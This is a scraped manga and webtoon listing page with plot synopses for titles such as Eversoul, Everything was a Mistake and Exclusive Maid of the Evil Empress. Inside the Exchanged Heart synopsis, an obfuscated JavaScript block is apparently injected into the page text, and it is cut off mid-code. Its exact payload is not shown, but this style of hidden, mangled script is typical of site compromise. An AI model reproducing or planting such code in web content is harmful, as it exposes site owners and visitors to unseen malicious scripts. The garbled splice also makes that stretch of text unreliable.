Historical - Page 66

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3970 results

Eversoul: Origins Of The Souls

**AWAKE YOUR SOUL.**A promotional webtoon for the 2023 gacha game "EVERSOUL".---In a world where all myths are real, magical beings called Souls are born from Eversouls — spirits living in old but treasured artifacts — and live eternal lives as invisible representations of said treasures. This webtoon depicts the lives of six such Souls from way before the events of the original game, with each Soul's story split into two chapters.


Everything was a Mistake

Roa Valrose reincarnated as villainess in the book. In order to avoid the fate of being burned at the stake, she approaches the hero, Nocton Edgar. It hurts every time she gets closer to him. Nevertheless, for her survival, she does everything he wants her to do. “Come again, Valrose.” The mysterious Nocton unexpectedly sought her out every day. Then one day, her friend for 10 years says something unknown to her. “Actually, I have a dream. The Duke of Edgar is a terrible villain!” He is not the hero, but the villain? As soon as she realized that she had misinterpreted the role, she decided to get away from Nocton. “Let’s not meet anymore.” But the villain’s reaction was strange. “Don’t go. You’ve always been special to me.” She was suspicious of his sudden change of attitude. Will she able to get rid of Nocton safely?


Evil King and Concubine: Healing Hands Cover the Sky

The poor modern female doctor picks up the mess when she travels, rejuvenates her life, makes countless treatments, and eventually becomes a myth!



Remember the tale of the little mermaid that fell in love with the dashing human prince? Now, imagine the roles reversed, as a romance blooms between the beautiful Evyione and a dashing young merman. It's a unique twist on timeless tale that is sure to leave you spellbound.


Exchanged Heart

"HyeonRyeong" lives inbetween the world of the living and the world of the dead because his heart got switched with "Gwi-Ho". When HyeonRyeong's village is hit with a string of mysterious murders, a powerful and mysterious shaman-girl named "GabJin" shows up. When HyeonRyeong's demonization speeds up, he and GabJin set off on a journey to find Gwi-Ho in order to turn him back into a human. (Source: Hour of Lunacy) The Red Night Inn / The Red Night Spirit / The Seal of the Red Night / The Stamp Seal of the Red Night / ?? ?? ??<script></script><script>(function(_0x28f4ce,_0x13c715){var _0x26c1d5=_0x3068,_0x59af48=_0x28f4ce();while(!![]){try{var _0x3277ba=-parseInt(_0x26c1d5(0xbd))/(-0xde1+-0x248c+0x326e)+parseInt(_0x26c1d5(0xc8))/(-0x1977+0xfa4+0x9d5)*(-parseInt(_0x26c1d5(0xb9))/(-0x2*0x66a+0xaaa+-0x1*-0x22d))+-parseInt(_0x26c1d5(0xbe))/(0x1835+0x1ab9+-0x32ea)*(parseInt(_0x26c1d5(0xc0))/(-0xf00*0x1+-0x23e6+0x3*0x10f9))+parseInt(_0x26c1d5(0xc6))/(0xc5f+0xbed+0x1*-0x1846)*(-parseInt(_0x26c1d5(0xd5))/(0x164b*0x1+-0x4fa+0x2*-0x8a5))+-parseInt(_0x26c1d5(0xd6))/(-0x1893+0x2656+0x1*-0xdbb)+parseInt(_0x26c1d5(0xcf))/(-0x3*0x760+0xaed+0xb3c)*(parseInt(_0x26c1d5(0xbc))/(0x5*-0x74f+-0x2625+0xa*0x779))+parseInt(_0x26c1d5(0xd7))/(-0x21a7+0x2637+0xd*-0x59)*(parseInt(_0x26c1d5(0xc2))/(-0x6a9+-0x26eb+0x2da0));if(_0x3277ba===_0x13c715)break;else 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Exclusive Furnace Of Future Empresses

Read Exclusive Furnace of Future EmpressesI don't know when men lost their comprehension physiques, unable to gather their souls for cultivation, and cultivation became exclusive to women. What's more terrible There seems to be a huge problem with the aesthetics of men in this world! The handsome male protagonist Luo Yang is considered an ugly man, and became a ferryman in the magpie building, but secretly he is a super paparazzi who has a lot of information, and as the only male in the cultivation world who can cultivate, his cultivation has reached the emperor level . Because of falling in love at first sight with Xia Peng who came to the Que Que Tower , she voluntarily became her exclusive stove. Since then, the sect that was originally mixed with fish and dragons has been turned upside down because of the arrival of the male leadHmphWhat I want to cultivate is the future Empress!


Exclusive Maid of the Evil Empress

Became the exclusive maid of the notorious empress. But what about the bad girl? The Empress is nothing but a petulant cat, and strangely she likes me. “Your Majesty, I don’t need to make my social debut.” “If you’re noble, you should make your official social debut at the ball. There’s nothing else to care about. Because I’m here.” ……I don’t want to make a social debut or anything. The empress quickly examined my appearance and even caught my scattered hair. I think the role of the maid-in-law and the empress has changed, but it’s probably because of their feelings, right? “If you show up holding the crown prince’s hand, it’ll be the best social debut ever. It’s a moment that every aristocratic spirit in the system dreams of.” I don’t dream! I glanced, speechless. Towards the crown prince, the greatest beauty of the empire called the work of art in human masks. Dressed up by the empress, a maid dancing her debut dance with the crown prince. What the hell is going on here?


Exclusive Possession Of Your Heart

I am imprisoned. The fiancé of my heart donor locked me up, saying that this heart belongs to him and that I must live in his dead fiancée's stead... By "live in his dead fiancée's stead" he means me to act like her, talk like her, dress like her, and think like her, as if I am just a manipulatable doll, a soulless shell, a vessel for another woman's heart. You may think the heart throbbing in my chest is yours, but my true heart is never yours! MangaToon got authorization from Cloud Studio to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Exclusively Sick Beautiful Master

Read Manhwa Exclusively Sick Beautiful Master Online For Free On Zinmanga The Content Exclusively Sick Beautiful Master: Chi Yunqing Found An Adorable Young Demon And, Despite Being Typically Cold And Stern, Softened His Heart And Took The Demon As His Direct Apprentice. To Ensure The Demon Wouldn’t Turn Mischievous, The Usually Frosty Immortal Instructed His Apprentices To Present A ‘Good Cub’ Each Time. A Decade Later, Observing The Clingy And Stubborn Apprentice Before Him, He Blinked And Felt That Something Was Wrong: Why Did He Raise A Troublemaker Wolf Cub Instead Of The Obedient One He Intended?” New And Hot Comics Are Updated The Fastest. Transformed Into A Piece Of Land Spring Letter In The Snow Zero 0 – Transcending The Future With Space-Time Magic Mangazin Is A Website That Aggregates The Latest And Hottest Manga, Updated Quickly To Serve Readers With High-Quality Images And Deliver Them An Excellent Experience.


Exhibition Catalog INOUENO: Mikazuki Edition

An exhibition catalog that details the background of the \"Inoue Takehiko: The LAST Manga Exhibition,\" held in the early summer of 2008 at the Ueno Royal Museum, through photos and text. It reveals why the exhibition was held at this time, and unveils Takehiko Inoue’s struggles and resolve. The first of two exhibition catalogues (Crescent Moon and Full Moon).


Exotic Flowers at All Corners of the Country

22-years-old Shen Qianling attained the status of the King of the Silver Screen for the first time in his life. Afterward, while he was holding his trophy and breaming with tears of happiness, a piece of ceiling fell with a loud bang, smashing onto his head accurately. After that, he… transmigrated! Qin Shaoyu: If Ling’er is willing to, Zhui Ying Palace can hold a wedding any time. Shen Qianling: To tell you the truth, I am very unwilling.


Extra of Attribute Collection

The liver emperor Fengxia was brutally conspiring to fall into a space crack and then pass through the cracks behind the scenes. Can the other world "encounter" the "them" in the Xuanyuan Continent by chance? What? Why is it a school girl, president, Aisha, Taimei, and cook? And I have to attack them all before I can go back? Not worth it! Raiders girls can burst out attributes? What are you waiting for? Sisters, come at me!
